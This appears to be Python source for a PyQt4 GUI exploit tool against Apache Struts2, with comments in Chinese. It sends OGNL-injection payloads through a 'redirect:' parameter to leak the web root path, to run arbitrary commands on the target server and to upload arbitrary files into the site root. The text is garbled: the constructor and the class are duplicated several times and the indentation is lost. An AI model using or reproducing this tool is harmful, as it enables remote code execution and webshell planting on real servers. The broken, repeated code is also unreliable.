def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit,
QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"),
self.Go)
QtCore.QObject.connect(self.ui.comboBox,
QtCore.SIGNAL("currentIndexChanged(int)"),
self.mode)
QtCore.QObject.connect(self.ui.pushButton_2,
QtCore.SIGNAL("clicked()"), self.file_dialog)
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go)
QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode)
QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog)
class StartQt4(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit,
QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"),
self.Go)
QtCore.QObject.connect(self.ui.comboBox,
QtCore.SIGNAL("currentIndexChanged(int)"),
self.mode)
QtCore.QObject.connect(self.ui.pushButton_2,
QtCore.SIGNAL("clicked()"), self.file_dialog)
def PoC(self):
payload = "?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D"
target_url = (self.address + payload)
#print(target_url)
try:
req = urllib.request.Request(target_url, method="GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %
(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def cmd(self):
self.command = str(self.ui.command.text())
#payload = "%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{command})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()".format(command = self.command)
payload = "?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{" + '"' + self.command + '"' + "})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23mat.getWriter().close()}"
target_url = (self.address + payload)
#print(target_url)
try:
req = requests.get(target_url)
data = req.content
#print(data)
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText(
"%s命令执行结果:\n%s" %
(self.command, data.rstrip())) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def Go(self):
self.address = str(self.ui.lineEdit.text())
if self.address:
if self.address.find('://') == -1:
self.address = 'http://' + self.address
if self.ui.comboBox.currentIndex() == 0:
self.PoC()
if self.ui.comboBox.currentIndex() == 1:
self.cmd()
elif self.ui.comboBox.currentIndex() == 2:
self.upload()
def file_dialog(self):
fd = QtGui.QFileDialog(self)
self.file = fd.getOpenFileName()
from os.path import isfile
if isfile(self.file):
import codecs
text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框
self.filename = str(self.ui.filename.text())
def upload(self):
content = (open(self.file, "r").read())
data = {"t": content}
#print(content)
payload = "?redirect:${{%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3dfalse%2c%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%5d%2c%23b%3dnew+java.io.FileOutputStream(new+java.lang.StringBuilder(%23a.getRealPath(%22/%22)).append(@java.io.File@separator).append(%22" + self.filename + '%22))%2c%23b.write(%23a.getParameter("t").getBytes())%2c%23b.close%28%29%2c%23p%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%5d.getWriter%28%29%2c%23p.println%28%22DONE%22%29%2c%23p.flush%28%29%2c%23p.close%28%29}}'
#payload = payload.replace(' ', '')
#print(payload)
target_url = (self.address + payload)
try:
#print(target_url)
req = urllib.request.Request(
target_url,
urllib.parse.urlencode(data).encode("UTF-8"),
method="POST")
response = urllib.request.urlopen(req)
data = response.read()
data = str(data, encoding="utf-8")
self.ui.textBrowser.setText("上传成功,文件已上传至网站根目录下:\n%s" %
(data)) #将结果输出至textBrowser
except Exception as e:
#print(e)
self.ui.textBrowser.setText("出现错误,错误回显为:%s" % (e))
def mode(self):
self.ui.comboBox.currentIndex()
class StartQt4(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow() #框主题名称
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.lineEdit, QtCore.SIGNAL('returnPressed()'), self.Go)
QtCore.QObject.connect(self.ui.pushButton, QtCore.SIGNAL("clicked()"), self.Go)
QtCore.QObject.connect(self.ui.comboBox, QtCore.SIGNAL("currentIndexChanged(int)"), self.mode)
QtCore.QObject.connect(self.ui.pushButton_2, QtCore.SIGNAL("clicked()"), self.file_dialog)
def PoC(self):
payload = "?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D"
target_url = (self.address + payload)
#print(target_url)
try:
req = urllib.request.Request(target_url, method = "GET")
response = urllib.request.urlopen(req)
if response:
data = response.read()
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def cmd(self):
self.command = str(self.ui.command.text())
#payload = "%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{command})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()".format(command = self.command)
payload = "?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{" + '"' + self.command + '"'+ "})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23mat.getWriter().close()}"
target_url = (self.address + payload)
#print(target_url)
try:
req = requests.get(target_url)
data = req.content
#print(data)
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser
except Exception as e:
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def Go(self):
self.address = str(self.ui.lineEdit.text())
if self.address:
if self.address.find('://') == -1:
self.address = 'http://' + self.address
if self.ui.comboBox.currentIndex() == 0:
self.PoC()
if self.ui.comboBox.currentIndex() == 1:
self.cmd()
elif self.ui.comboBox.currentIndex() == 2:
self.upload()
def file_dialog(self):
fd = QtGui.QFileDialog(self)
self.file = fd.getOpenFileName()
from os.path import isfile
if isfile(self.file):
import codecs
text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框
self.filename = str(self.ui.filename.text())
def upload(self):
content = (open(self.file, "r").read())
data = {"t":content}
#print(content)
payload = "?redirect:${{%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3dfalse%2c%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%5d%2c%23b%3dnew+java.io.FileOutputStream(new+java.lang.StringBuilder(%23a.getRealPath(%22/%22)).append(@java.io.File@separator).append(%22"+ self.filename + '%22))%2c%23b.write(%23a.getParameter("t").getBytes())%2c%23b.close%28%29%2c%23p%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%5d.getWriter%28%29%2c%23p.println%28%22DONE%22%29%2c%23p.flush%28%29%2c%23p.close%28%29}}'
#payload = payload.replace(' ', '')
#print(payload)
target_url = (self.address + payload)
try:
#print(target_url)
req = urllib.request.Request(target_url, urllib.parse.urlencode(data).encode("UTF-8"), method = "POST")
response = urllib.request.urlopen(req)
data = response.read()
data = str(data, encoding = "utf-8")
self.ui.textBrowser.setText("上传成功,文件已上传至网站根目录下:\n%s" %(data)) #将结果输出至textBrowser
except Exception as e:
#print(e)
self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e))
def mode(self):
self.ui.comboBox.currentIndex()